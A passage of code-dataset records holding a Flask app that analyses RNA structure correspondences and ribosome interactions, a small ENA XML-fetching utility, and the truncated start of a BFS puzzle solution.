getting the members of Equivalence Class from the query chain\n ife_list = NrChains.query.join(NrClasses, NrReleases) \\\n .filter(NrChains.ife_id == query_ife).filter(NrClasses.resolution == '4.0') \\\n .order_by(NrReleases.date.desc()).limit(1)\n for row in ife_list:\n class_id = row.nr_class_id\n\n ec_query = NrClasses.query.filter_by(nr_class_id=class_id)\n for row in ec_query:\n equivalence_class = row.name\n nr_release = row.nr_release_id\n\n members_query = NrChains.query.filter_by(nr_class_id=class_id)\n ife_members = []\n for row in members_query:\n ife_members.append(row.ife_id)\n\n # remove ifes that are joined (+) or in reject_list; build new lists rather than\n # deleting from ife_members while enumerating it, which skips entries after each deletion\n rejected_ife = [ife for ife in ife_members if '+' in ife or ife in reject_list]\n ife_members = [ife for ife in ife_members if ife not in rejected_ife]\n\n members_pdb = []\n members_chain = []\n\n for ife in ife_members:\n members_pdb.append(ife.split('|')[0])\n members_chain.append(ife.split('|')[-1])\n\n members_info = zip(members_pdb, members_chain)\n #######################################################################################################\n # query nts as a string\n query_nts = ', '.join(units_complete_list)\n\n query_complete_len = len(units_complete_list)\n #####################################################################################################\n\n # This section deals with getting the units of unmodified nucleotides\n '''\n standard_nts = ('A', 'C', 'G', 'U')\n\n units_std_list = []\n\n for unit in units_complete_list:\n k = unit.split('|')[-2]\n if k in standard_nts:\n units_std_list.append(unit)\n\n query_std_len = len(units_std_list)\n '''\n\n #####################################################################################################\n\n # This section of the code deals with getting the complete corresponding unit_ids\n ordering = case(\n {unit: index for index, unit in enumerate(units_complete_list)},\n value=UnitCorrespondence.unit_id_1\n )\n\n correspondence_complete = UnitCorrespondence.query.filter(UnitCorrespondence.unit_id_1.in_(units_complete_list)) \\\n .order_by(ordering) \\\n .filter(tuple_(UnitCorrespondence.pdb_id_2, UnitCorrespondence.chain_name_2) \\\n .in_(members_info))\n\n # result_complete = [[unit.unit_id_2 for unit in units] for unit_id_1, units in\n # itertools.groupby(correspondence_complete, lambda x: x.unit_id_1)]\n\n # corr_complete = zip(*result_complete)\n # Append the units of the query motif\n # corr_complete.append(units_complete_list)\n\n corr_units = 
[]\n\n for row in correspondence_complete:\n corr_units.append(row.unit_id_2)\n\n corr_filtered = check_insertion(corr_units)\n corr_grouped = group_corr(corr_filtered)\n corr_grouped = [x for x in corr_grouped if len(x) == query_complete_len]\n corr_complete = order_num(corr_grouped)\n corr_complete.append(units_complete_list)\n corr_std = deepcopy(corr_complete)\n\n accepted_seq = ['A', 'C', 'G', 'U']\n mod_idx = []\n for elem1 in corr_complete:\n for elem2 in elem1:\n seq = elem2.split('|')[3]\n if seq not in accepted_seq:\n mod_idx.append(elem1.index(elem2))\n\n mod_unique = set(mod_idx)\n mod_idx = list(mod_unique)\n\n for elem1 in corr_std:\n for ele in sorted(mod_idx, reverse = True): \n del elem1[ele]\n\n query_std_len = len(corr_std[0])\n\n return json.dumps(corr_complete)\n\n '''\n\n # first_elem = []\n\n # for sublist in corr_ordered:\n # first_elem.append(sublist[0].split('|')[-1])\n\n # Create lists for residue type and number\n unit_list = []\n res_num = []\n res_type = []\n for units in corr_complete:\n unit_list.append(units[0])\n for unit in units:\n res_num.append(unit.split('|')[-1])\n res_type.append(unit.split('|')[-2])\n # ife = '|'.join(units[0].split('|')[:3])\n # unit_list.append(ife)\n\n res_num_list = [res_num[i:i + query_complete_len] for i in range(0, len(res_num), query_complete_len)]\n res_type_list = [res_type[i:i + query_complete_len] for i in range(0, len(res_type), query_complete_len)]\n # res_list = [res_num[i:i + query_complete_len] for i in xrange(0, len(res_num), query_complete_len)]\n\n residue_num_unordered = []\n for a in range(0, len(res_num_list)):\n residue_num_unordered.append([\"{}{}\".format(x, y) for x, y in zip(res_type_list[a], res_num_list[a])])\n\n # Create list of IFES\n ife_list = []\n for elem in unit_list:\n ife = '|'.join(elem.split('|')[:3])\n ife_list.append(ife)\n\n # Create list of coordinates as strings\n coord_unordered = []\n for x in corr_complete:\n x = ','.join(x)\n coord_unordered.append(x)\n\n # Create a dictionary of ifes with coordinate data\n ife_coord = dict(zip(ife_list, coord_unordered))\n\n # Create a dictionary of ifes with residue list\n ife_res = dict(zip(ife_list, residue_num_unordered))\n\n pdb_updated = []\n chain_updated = []\n\n for ife in ife_list:\n pdb_updated.append(ife.split('|')[0])\n chain_updated.append(ife.split('|')[-1])\n\n members_info_updated = zip(pdb_updated, chain_updated)\n ##################################################################################\n\n # Comment out\n # Get the list of corresponding unit-ids without modified nucleotides\n \n ordering = case(\n {unit: index for index, unit in enumerate(units_std_list)},\n value=UnitCorrespondence.unit_id_1\n )\n\n correspondence_std = UnitCorrespondence.query.filter(UnitCorrespondence.unit_id_1.in_(units_std_list)) \\\n .order_by(ordering) \\\n .filter(tuple_(UnitCorrespondence.pdb_id_2, UnitCorrespondence.chain_name_2) \\\n .in_(members_info_updated))\n\n corr_std_units = []\n for row in correspondence_std:\n corr_std_units.append(row.unit_id_2)\n\n corr_std_grouped = group_corr(corr_std_units)\n corr_std_grouped = [x for x in corr_std_grouped if len(x) == query_std_len]\n corr_std = order_num(corr_std_grouped)\n\n # Append the standard units of the query motif\n corr_std.append(units_std_list)\n \n\n ##################################################################################\n\n # Logic to get and display pairwise interactions from the database\n bps_comb = []\n for a in range(0, len(corr_complete)):\n 
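The deletion loop just above walks mod_idx in descending order, which is the detail that makes in-place del safe: removing the largest position first leaves every smaller position still valid. The same pattern in isolation:

# deleting several positions from a list: go high-to-low so earlier deletions
# cannot shift the indices that are still pending
seq = ['A', 'C', 'G', 'U', 'G']
drop = [1, 3]
for i in sorted(drop, reverse=True):
    del seq[i]
print(seq)  # ['A', 'G', 'G']; ascending order would have deleted the wrong elements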
bps_comb.append([(map(str, comb)) for comb in combinations(corr_complete[a], 2)])\n\n unit1 = []\n unit2 = []\n bpair = []\n bstack = []\n bphosphate = []\n bribose = []\n for a in range(0, len(corr_complete)):\n bps_list = UnitPairInteractions.query.filter(\n tuple_(UnitPairInteractions.unit_id_1, UnitPairInteractions.unit_id_2) \\\n .in_(bps_comb[a]))\n\n for row in bps_list:\n unit1.append(row.unit_id_1)\n unit2.append(row.unit_id_2)\n bpair.append(row.f_lwbp)\n bstack.append(row.f_stacks)\n bphosphate.append(row.f_bphs)\n bribose.append(row.f_brbs)\n\n pairwise_info = zip(unit1, unit2, bpair, bstack, bphosphate, bribose)\n\n filtered_pw_info = []\n for elem in pairwise_info:\n a = list(filter(lambda a: a != None, elem))\n filtered_pw_info.append(a)\n\n # return json.dumps(filtered_pw_info)\n\n units_order = {}\n for idx, unit in enumerate(units_complete_list):\n unit = unit.split('|')[-1]\n units_order[unit] = idx + 1\n\n n1 = []\n n2 = []\n\n for n in filtered_pw_info:\n n_1 = n[0].split('|')[-1]\n n_2 = n[1].split('|')[-1]\n try:\n n1.append(int(n_1))\n n2.append(int(n_2))\n except:\n pass\n\n possible_pw = zip(n1, n2)\n unique_pw = list(set(possible_pw))\n pw_sorted = sorted(unique_pw, key=getKey)\n\n pw_info = {k: OrderedDict({t: '-' for t in pw_sorted}) for k in ife_list}\n\n for sub_lst in filtered_pw_info:\n k0, k1 = '|'.join(sub_lst[0].split('|')[:3]), '|'.join(sub_lst[1].split('|')[:3])\n if k0 == k1 and k0 in pw_info:\n try:\n sub_key = (int(sub_lst[0][sub_lst[0].rfind('|') + 1:]), int(sub_lst[1][sub_lst[1].rfind('|') + 1:]))\n pw_info[k0][sub_key] = sub_lst[2] if len(sub_lst) == 3 else ';'.join(sub_lst[2:])\n except:\n pass\n\n ######################################################################################\n\n # Get center and rotation data for calculating discrepancy\n\n # Create list to store the centers np array\n units_center = []\n units_num_center = []\n\n # This section of the code deals with the database query to get the centers data\n for units in corr_std:\n\n ordering = case(\n {id: index for index, id in enumerate(units)},\n value=UnitCenters.unit_id\n )\n\n centers_query = UnitCenters.query.filter(UnitCenters.unit_id.in_(units),\n UnitCenters.name == 'base').order_by(ordering)\n for row in centers_query:\n units_center.append(np.array([row.x, row.y, row.z]))\n units_num_center.append(row.unit_id)\n\n units_center_list = [units_center[i:i + query_std_len] for i in xrange(0, len(units_center), query_std_len)]\n\n # Create list to store the rotation np array\n units_rotation = []\n units_num_rotation = []\n\n # This section of the code deals with the database query to get the rotation data\n for units in corr_std:\n\n ordering = case(\n {id: index for index, id in enumerate(units)},\n value=UnitRotations.unit_id\n )\n\n rotation_query = UnitRotations.query.filter(UnitRotations.unit_id.in_(units)).order_by(ordering)\n\n for row in rotation_query:\n units_rotation.append(np.array([[row.cell_0_0, row.cell_0_1, row.cell_0_2],\n [row.cell_1_0, row.cell_1_1, row.cell_1_2],\n [row.cell_2_0, row.cell_2_1, row.cell_2_2]]))\n units_num_rotation.append(row.unit_id)\n\n units_rotation_list = [units_rotation[i:i + query_std_len] for i in xrange(0, len(units_rotation), query_std_len)]\n\n rotation_size = len(units_rotation_list)\n\n ####################################################################################\n\n # This section of the code deals with calculating the discrepancy for the corresponding instances\n distances = coll.defaultdict(lambda: 
coll.defaultdict(int))\n\n for a in range(0, len(ife_list)):\n for b in range(a + 1, len(ife_list)):\n disc = matrix_discrepancy(units_center_list[a], units_rotation_list[a], units_center_list[b],\n units_rotation_list[b])\n distances[ife_list[a]][ife_list[b]] = disc\n\n # Empty list to append pairs of IFE with NaN discrepancy\n ife_nan = []\n\n for k, v in distances.items():\n for a, b in v.items():\n if math.isnan(b):\n ife_nan.append((k, a))\n v[a] = -0.1\n\n dist = np.zeros((len(ife_list), len(ife_list)))\n for index1, member1 in enumerate(ife_list):\n curr = distances.get(member1, {})\n for index2, member2 in enumerate(ife_list):\n dist[index1, index2] = curr.get(member2, 0)\n\n dist = (dist + np.swapaxes(dist, 0, 1))\n\n # ordering, _, _ = orderWithPathLengthFromDistanceMatrix(dist, 10, scanForNan=True)\n disc_order = optimalLeafOrder(dist)\n\n new_ordering = []\n idx_ordering = []\n\n for idx, order in enumerate(disc_order):\n new_ordering.append(ife_list[order])\n idx_ordering.append(idx)\n\n ifes_ordered = zip(idx_ordering, new_ordering)\n\n coord_ordered = []\n # append the coordinates based on new ordering\n for index in ifes_ordered:\n for key, val in ife_coord.iteritems():\n if index[1] == key:\n coord_ordered.append(val)\n\n res_list_ordered = []\n for index in ifes_ordered:\n for key, val in ife_res.iteritems():\n if index[1] == key:\n res_list_ordered.append(val)\n\n #########################################################################################\n\n # Logic to order and build the heatmap data\n\n # function to get the discrepancy based on the new ordering\n def get(d, first, second):\n return d.get(second, {}).get(first, 0.0)\n\n index1 = []\n index2 = []\n ife1 = []\n ife2 = []\n\n for member1 in ifes_ordered:\n for member2 in ifes_ordered:\n index1.append(member1[0])\n ife1.append(member1[1])\n index2.append(member2[0])\n ife2.append(member2[1])\n\n ife_pairs = zip(ife1, ife2)\n\n disc_ordered = [get(distances, first, second) or get(distances, second, first) for first, second in ife_pairs]\n\n disc_formatted = []\n for disc in disc_ordered:\n disc = '%.4f' % disc\n disc_formatted.append(disc)\n\n a = np.array(disc_formatted)\n a = a.astype(np.float)\n p1 = np.percentile(a, 90)\n p2 = np.percentile(a, 95)\n p3 = np.percentile(a, 99)\n maxDisc = np.amax(a)\n\n \n # Need to comment out\n rows = zip(ife1, ife2, disc_formatted)\n\n with open('/Applications/mamp/htdocs/corr-server/Disc/SSU-J/' + loop_id + '_disc.csv', \"w\") as f:\n writer = csv.writer(f)\n writer.writerow([\"ID1\", \"ID2\", \"Disc\"])\n for row in rows:\n writer.writerow(row)\n \n\n # return 'Max value for discrepancy is: {} and 95th percentile is {}'.format(maxDisc, p)\n\n heatmap_data = [\n {\"ife1\": ife1, \"ife1_index\": ife1_index, \"ife2\": ife2, \"ife2_index\": ife2_index, \"discrepancy\": discrepancy}\n for ife1, ife1_index, ife2, ife2_index, discrepancy in zip(ife1, index1, ife2, index2, disc_formatted)\n ]\n\n trna_occupancy = []\n functional_state = []\n factors_bound = []\n antibiotic_bound = []\n for order in ifes_ordered:\n for state in annotation:\n if order[1] == state[0]:\n trna_occupancy.append(state[1])\n functional_state.append(state[2])\n factors_bound.append(state[3])\n antibiotic_bound.append(state[4])\n\n new_order = []\n for elem in ifes_ordered:\n new_order.append(elem[1])\n\n pw_info_ordered = custom_order(pw_info, new_order)\n\n ###########################################################################################\n return 
render_template(\"correspondence_display.html\", query_pdb=query_pdb, query_nts=query_nts,\n coord=coord_ordered, ifes=ifes_ordered, maxDisc=maxDisc, p1=p1, p2=p2, p3=p3,\n # loop_position=loop_position,\n ec=equivalence_class, release=nr_release, residue_info=res_list_ordered, data=heatmap_data,\n trna_occupancy=trna_occupancy, functional_state=functional_state,\n factors_bound=factors_bound,\n antibiotic_bound=antibiotic_bound, pw_info=pw_info_ordered, pw_list=pw_sorted)\n\n\n@app.route('/bridges')\ndef bridges():\n\n def getKey(item):\n return item[0]\n\n ife_collection = [\"3J9Y|1|a\", \"3J9Z|1|SA\", \"3JA1|1|SA\", \"3JBU|1|A\", \"3JBV|1|A\", \"3JCD|1|a\", \"3JCE|1|a\", \"3JCJ|1|g\",\n \"4U1U|1|AA\", \"4U1U|1|CA\", \"4U1V|1|AA\", \"4U1V|1|CA\", \"4U20|1|AA\",\n \"4U20|1|CA\", \"4U24|1|AA\", \"4U24|1|CA\", \"4U25|1|AA\", \"4U25|1|CA\", \"4U26|1|AA\", \"4U26|1|CA\",\n \"4U27|1|AA\", \"4U27|1|CA\", \"4V4H|1|AA\", \"4V4H|1|CA\", \"4V4Q|1|AA\", \"4V4Q|1|CA\", \"4V50|1|AA\",\n \"4V50|1|CA\", \"4V52|1|AA\", \"4V52|1|CA\", \"4V53|1|AA\", \"4V53|1|CA\", \"4V54|1|AA\", \"4V54|1|CA\",\n \"4V55|1|AA\", \"4V55|1|CA\", \"4V56|1|AA\", \"4V56|1|CA\", \"4V57|1|AA\", \"4V57|1|CA\", \"4V5B|1|BA\",\n \"4V5B|1|DA\", \"4V64|1|AA\", \"4V64|1|CA\", \"4V6C|1|AA\", \"4V6C|1|CA\", \"4V6D|1|AA\", \"4V6D|1|CA\",\n \"4V6E|1|AA\", \"4V6E|1|CA\", \"4V7S|1|AA\", \"4V7S|1|CA\", \"4V7T|1|AA\", \"4V7T|1|CA\", \"4V7U|1|AA\",\n \"4V7U|1|CA\", \"4V7V|1|AA\", \"4V7V|1|CA\", \"4V85|1|AA\", \"4V89|1|AA\",\n \"4V9C|1|AA\", \"4V9C|1|CA\", \"4V9D|1|AA\", \"4V9D|1|BA\", \"4V9O|1|BA\", \"4V9O|1|DA\", \"4V9O|1|FA\",\n \"4V9O|1|HA\", \"4V9P|1|BA\", \"4V9P|1|DA\", \"4V9P|1|FA\", \"4V9P|1|HA\", \"4WF1|1|AA\", \"4WF1|1|CA\",\n \"4WOI|1|AA\", \"4WOI|1|DA\", \"4WWW|1|QA\", \"4WWW|1|XA\", \"4YBB|1|AA\", \"4YBB|1|BA\", \"5H5U|1|h\",\n \"5IQR|1|2\", \"5IT8|1|AA\", \"5IT8|1|BA\", \"5J5B|1|AA\", \"5J5B|1|BA\", \"5J7L|1|BA\", \"5J88|1|AA\",\n \"5J88|1|BA\", \"5J8A|1|AA\", \"5J8A|1|BA\", \"5J91|1|AA\", \"5J91|1|BA\", \"5JC9|1|AA\", \"5JC9|1|BA\",\n \"5JTE|1|AA\", \"5JU8|1|AA\", \"5KCR|1|1a\", \"5KCS|1|1a\", \"5KPS|1|27\", \"5KPW|1|26\", \"5KPX|1|26\",\n \"5L3P|1|a\", \"5MDV|1|2\", \"5MDW|1|2\", \"5MDY|1|2\", \"5MDZ|1|2\", \"5MGP|1|a\", \"5NP6|1|D\", \"5NWY|1|0\",\n \"5O2R|1|a\", \"5U4I|1|a\", \"5U4J|1|a\", \"5U9F|1|A\", \"5U9G|1|A\", \"5UYK|1|A\", \"5UYL|1|A\", \"5UYM|1|A\",\n \"5UYN|1|A\", \"5UYP|1|A\", \"5UYQ|1|A\", \"5WDT|1|a\", \"5WE4|1|a\", \"5WE6|1|a\", \"5WF0|1|a\", \"5WFS|1|a\",\n \"6BU8|1|A\", \"6C4I|1|a\", \"6DNC|1|A\", \"6ENF|1|a\", \"6ENJ|1|a\", \"6ENU|1|a\", \"5J7L|1|AA\"]\n\n unit1 = []\n unit2 = []\n bpair = []\n bstack = []\n bphosphate = []\n bribose = []\n fcrossing = []\n\n for elem in range(0, len(ribosome_subunits)):\n bridge_list = UnitPairInteractions.query.filter(\n UnitPairInteractions.unit_id_1.like(ribosome_subunits[elem][0] + '%') &\n UnitPairInteractions.unit_id_2.like(ribosome_subunits[elem][1] + '%'))\n for row in bridge_list:\n unit1.append(row.unit_id_1)\n unit2.append(row.unit_id_2)\n bpair.append(row.f_lwbp)\n bstack.append(row.f_stacks)\n bphosphate.append(row.f_bphs)\n bribose.append(row.f_brbs)\n fcrossing.append(row.f_crossing)\n\n pairwise_info = zip(unit1, unit2, bpair, bstack, bphosphate, bribose)\n\n bridging_interactions = []\n for elem in pairwise_info:\n a = list(filter(lambda a: a != None, elem))\n bridging_interactions.append(a)\n\n unit1 = []\n unit2 = []\n for i in bridging_interactions:\n n_1 = i[0].split('|')[-1]\n n_2 = i[1].split('|')[-1]\n try:\n unit1.append(int(n_1))\n 
unit2.append(int(n_2))\n except:\n pass\n\n possible_pw = zip(unit1, unit2)\n unique_pw = list(set(possible_pw))\n pw_sorted = sorted(unique_pw, key=lambda element: (element[0], element[1]))\n\n pw_info = {k: OrderedDict({t: '-' for t in pw_sorted}) for k in ife_collection}\n\n for sub_lst in bridging_interactions:\n k0, k1 = '|'.join(sub_lst[0].split('|')[:3]), '|'.join(sub_lst[1].split('|')[:3])\n if k0 in pw_info:\n v1, v2 = sub_lst[0], sub_lst[1]\n # `sub_key` is aimed to be a key for inner dict of the predefined `pw_info` dict\n # thus it's composed as a tuple of trailing numbers of the first 2 items\n # in sub_list (ex. `(262, 263)`)\n sub_key = (int(v1[v1.rfind('|') + 1:]), int(v2[v2.rfind('|') + 1:]))\n pw_info[k0][sub_key] = sub_lst[2] if len(sub_lst) == 3 else ';'.join(sub_lst[2:])\n\n SSU_chain = pw_info.keys()\n LSU_chain = []\n for elem1 in SSU_chain:\n for elem2 in ribosome_subunits:\n if elem1 == elem2[0]:\n LSU_chain.append(elem2[1])\n\n return render_template(\"bridge_table.html\", SSU_chain=SSU_chain, LSU_chain=LSU_chain, pw_info=pw_info, pw_list=pw_sorted)\n # return json.dumps(str(LSU_chain))\n\n@app.route('/trna_interactions')\ndef trna_interactions():\n\n # ife_pairs = [('6BU8|1|A', '6BU8|1|Y'), ('3JCE|1|a', '3JCE|1|6'), ('5UYK|1|A', '5UYK|1|Y'), ('5UYL|1|A', '5UYL|1|Y'), ('5UYM|1|A', '5UYM|1|Y'), ('5UYN|1|A', '5UYN|1|Y'), ('5UYP|1|A', '5UYP|1|Y'), ('5UYQ|1|A', '5UYQ|1|Y'), ('5WDT|1|a', '5WDT|1|y'), ('5WE4|1|a', '5WE4|1|y'), ('5WE6|1|a', '5WE6|1|y'), ('5WF0|1|a', '5WF0|1|y'), ('5WFK|1|a', '5WFK|1|y'), ('5WFS|1|a', '5WFS|1|y'), ('6ENJ|1|a', '6ENJ|1|9'), ('3JBV|1|A', '3JBV|1|V'), ('5JTE|1|AA', '5JTE|1|AW'), ('5LZD|1|a', '5LZD|1|y'), ('5IQR|1|2', '5IQR|1|6'), ('5KPW|1|26', '5KPW|1|30'), ('5KPX|1|26', '5KPX|1|30'), ('5L3P|1|a', '5L3P|1|y'), ('4V6E|1|AA', '4V6E|1|AX'), ('4V6E|1|CA', '4V6E|1|CX')]\n # ife_pairs = [('6BU8|1|A', '6BU8|1|W'), ('3JCE|1|a', '3JCE|1|8'), ('5UYK|1|A', '5UYK|1|W'), ('5UYL|1|A', '5UYL|1|W'), ('5UYM|1|A', '5UYM|1|W'), ('5UYN|1|A', '5UYN|1|W'), ('5UYP|1|A', '5UYP|1|W'), ('5UYQ|1|A', '5UYQ|1|W'), ('5WDT|1|a', '5WDT|1|v'), ('5WE4|1|a', '5WE4|1|v'), ('5WE6|1|a', '5WE6|1|v'), ('5WF0|1|a', '5WF0|1|v'), ('5WFK|1|a', '5WFK|1|v'), ('5WFS|1|a', '5WFS|1|v'), ('6ENJ|1|a', '6ENJ|1|x'), ('3JBV|1|A', '3JBV|1|W'), ('5JTE|1|AA', '5JTE|1|AX'), ('5LZD|1|a', '5LZD|1|v'), ('5IQR|1|2', '5IQR|1|5'), ('5KPW|1|26', '5KPW|1|31'), ('5KPX|1|26', '5KPX|1|31'), ('5L3P|1|a', '5L3P|1|x'), ('4V6E|1|AA', '4V6E|1|AV'), ('4V6E|1|CA', '4V6E|1|CV')]\n # ife_pairs = [('6BU8|1|A', '6BU8|1|X'), ('3JCD|1|a', '3JCD|1|9'), ('3JCE|1|a', '3JCE|1|9'), ('5UYK|1|A', '5UYK|1|X'), ('5UYL|1|A', '5UYL|1|X'), ('5UYM|1|A', '5UYM|1|X'), ('5UYN|1|A', '5UYN|1|X'), ('5UYP|1|A', '5UYP|1|X'), ('5UYQ|1|A', '5UYQ|1|X'), ('5WDT|1|a', '5WDT|1|w'), ('5WE4|1|a', '5WE4|1|w'), ('5WE6|1|a', '5WE6|1|w'), ('5WF0|1|a', '5WF0|1|w'), ('5WFK|1|a', '5WFK|1|w'), ('5WFS|1|a', '5WFS|1|w'), ('3J9Z|1|SA', '3J9Z|1|S7'), ('6DNC|1|A', '6DNC|1|D'), ('6H4N|1|a', '6H4N|1|w'), ('5U4I|1|a', '5U4I|1|y'), ('5U9F|1|A', '5U9F|1|X'), ('5U9G|1|A', '5U9G|1|X'), ('6C4I|1|a', '6C4I|1|y'), ('5JTE|1|AA', '5JTE|1|AY'), ('5JU8|1|AA', '5JU8|1|AY'), ('5IQR|1|2', '5IQR|1|4'), ('5KPS|1|27', '5KPS|1|32'), ('5KPW|1|26', '5KPW|1|32'), ('5KPX|1|26', '5KPX|1|32')]\n ife_pairs = [('6BU8|1|01', '6BU8|1|Y'), ('3JCE|1|A', '3JCE|1|6'), ('5UYK|1|01', '5UYK|1|Y'), ('5UYL|1|01', '5UYL|1|Y'), ('5UYM|1|01', '5UYM|1|Y'), ('5UYN|1|01', '5UYN|1|Y'), ('5UYP|1|01', '5UYP|1|Y'), ('5UYQ|1|01', '5UYQ|1|Y'), ('5WDT|1|A', '5WDT|1|y'), ('5WE4|1|A', '5WE4|1|y'), ('5WE6|1|A', 
'5WE6|1|y'), ('5WF0|1|A', '5WF0|1|y'), ('5WFK|1|A', '5WFK|1|y'), ('5WFS|1|A', '5WFS|1|y'), ('6ENJ|1|A', '6ENJ|1|9'), ('3JBV|1|b', '3JBV|1|V'), ('5JTE|1|BA', '5JTE|1|AW'), ('5LZD|1|A', '5LZD|1|y'), ('5IQR|1|1', '5IQR|1|6'), ('5KPW|1|27', '5KPW|1|30'), ('5KPX|1|27', '5KPX|1|30'), ('5L3P|1|A', '5L3P|1|y'), ('4V6E|1|BA', '4V6E|1|AX'), ('4V6E|1|DA', '4V6E|1|CX')]\n\n ife_key = []\n for i in ife_pairs:\n ife_key.append(i[1])\n\n unit1 = []\n unit2 = []\n bpair = []\n bstack = []\n bphosphate = []\n bribose = []\n fcrossing = []\n\n for elem in range(0, len(ife_pairs)):\n bridge_list = UnitPairInteractions.query.filter(\n UnitPairInteractions.unit_id_1.like(ife_pairs[elem][0] + '%') &\n UnitPairInteractions.unit_id_2.like(ife_pairs[elem][1] + '%'))\n for row in bridge_list:\n unit1.append(row.unit_id_1)\n unit2.append(row.unit_id_2)\n bpair.append(row.f_lwbp)\n bstack.append(row.f_stacks)\n bphosphate.append(row.f_bphs)\n bribose.append(row.f_brbs)\n fcrossing.append(row.f_crossing)\n\n pairwise_info = zip(unit1, unit2, bpair, bstack, bphosphate, bribose)\n\n pw_interactions = []\n for elem in pairwise_info:\n a = list(filter(lambda a: a != None, elem))\n pw_interactions.append(a)\n\n unit1 = []\n unit2 = []\n for i in pw_interactions:\n n_1 = i[0].split('|')[-1]\n n_2 = i[1].split('|')[-1]\n try:\n unit1.append(int(n_1))\n unit2.append(int(n_2))\n except:\n pass\n\n possible_pw = zip(unit1, unit2)\n unique_pw = list(set(possible_pw))\n pw_sorted = sorted(unique_pw, key=lambda element: (element[0], element[1]))\n\n pw_info = {k: OrderedDict({t: '-' for t in pw_sorted}) for k in ife_key}\n\n\n for sub_lst in pw_interactions:\n k0, k1 = '|'.join(sub_lst[0].split('|')[:3]), '|'.join(sub_lst[1].split('|')[:3])\n if k1 in pw_info:\n v1, v2 = sub_lst[0], sub_lst[1]\n # `sub_key` is aimed to be a key for inner dict of the predefined `pw_info` dict\n # thus it's composed as a tuple of trailing numbers of the first 2 items\n # in sub_list (ex. 
`(262, 263)`)\n sub_key = (int(v1[v1.rfind('|') + 1:]), int(v2[v2.rfind('|') + 1:]))\n pw_info[k1][sub_key] = sub_lst[2] if len(sub_lst) == 3 else ';'.join(sub_lst[2:])\n\n ife_trna = []\n for i in ife_pairs:\n ife_trna.append(i[1])\n\n index_map = {v: i for i, v in enumerate(ife_trna)}\n pw_info = OrderedDict(sorted(pw_info.items(), key=lambda pair: index_map[pair[0]]))\n\n return render_template(\"trna_interaction.html\", ife_pairs=ife_pairs, pw_info=pw_info, pw_list=pw_sorted)\n \n '''\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "sridevan/corr-server", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 59657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.set_printoptions", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 28, "usage_type": "call"}, {"api_name": "flask_bootstrap.Bootstrap", "line_number": 33, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 357, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 357, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 409, "usage_type": "call"}, {"api_name": "itertools.groupby", "line_number": 420, "usage_type": "call"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 465, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 465, "usage_type": "name"}, {"api_name": "sqlalchemy.case", "line_number": 552, "usage_type": "call"}, {"api_name": "sqlalchemy.tuple_", "line_number": 559, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 579, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 598, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 598, "usage_type": "name"}]} +{"seq_id": "34892338536", "text": "import requests\nfrom lxml import etree\nfrom retry import retry\n\n\n@retry(tries=3, delay=2, backoff=1.2, jitter=(1, 3))\ndef download_xml_from_ena(ena_url) -> etree.XML:\n \"\"\"Download and parse XML from ENA\"\"\"\n try: # catches any kind of request error, including non-20X status code\n response = requests.get(ena_url)\n response.raise_for_status()\n except requests.exceptions.RequestException as e:\n raise e\n root = etree.XML(bytes(response.text, encoding='utf-8'))\n return root\n\n\ndef get_assembly_name_and_taxonomy_id(assembly_accession):\n xml_root = download_xml_from_ena(f'https://www.ebi.ac.uk/ena/browser/api/xml/{assembly_accession}')\n xml_assembly = xml_root.xpath('/ASSEMBLY_SET/ASSEMBLY')\n if len(xml_assembly) == 0:\n raise ValueError(f'Assembly {assembly_accession} not found in ENA')\n assembly_name = xml_assembly[0].get('alias')\n taxonomy_id = int(xml_assembly[0].xpath('TAXON/TAXON_ID')[0].text)\n return assembly_name, taxonomy_id\n\n\ndef get_scientific_name_and_common_name(taxonomy_id):\n xml_root = download_xml_from_ena(f'https://www.ebi.ac.uk/ena/browser/api/xml/{taxonomy_id}')\n xml_taxon = xml_root.xpath('/TAXON_SET/taxon')\n if len(xml_taxon) == 0:\n raise ValueError(f'Taxonomy {taxonomy_id} not found in ENA')\n scientific_name = xml_taxon[0].get('scientificName')\n optional_common_name = xml_taxon[0].get('commonName')\n return 
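The @retry decorator used by download_xml_from_ena in the record above comes from the retry package; with no exception class given it retries on any error. A sketch of the same knobs on a hypothetical fetch helper, narrowed (as an illustrative choice, not the record's) to request errors:

import requests
from retry import retry

# tries=3: at most 3 attempts; delay=2: initial wait in seconds;
# backoff=1.2: each wait is 1.2x the previous; jitter=(1, 3): add a random 1-3 s per wait
@retry(requests.exceptions.RequestException, tries=3, delay=2, backoff=1.2, jitter=(1, 3))
def fetch(url):
    response = requests.get(url, timeout=30)
    response.raise_for_status()
    return response.text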
scientific_name, optional_common_name\n", "repo_name": "EBIvariation/eva-common-pyutils", "sub_path": "ebi_eva_common_pyutils/ena_utils.py", "file_name": "ena_utils.py", "file_ext": "py", "file_size_in_byte": 1465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 12, "usage_type": "attribute"}, {"api_name": "lxml.etree.XML", "line_number": 14, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 14, "usage_type": "name"}, {"api_name": "retry.retry", "line_number": 6, "usage_type": "call"}, {"api_name": "lxml.etree.XML", "line_number": 7, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "38065527157", "text": "import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\n\ndef solve():\n m, n, h = map(int, input().split())\n tomato = [[] for _ in range(h)]\n haveto = 0\n tmt = deque()\n for k in range(h):\n for i in range(n):\n tomato[k].append(input().split())\n for j in 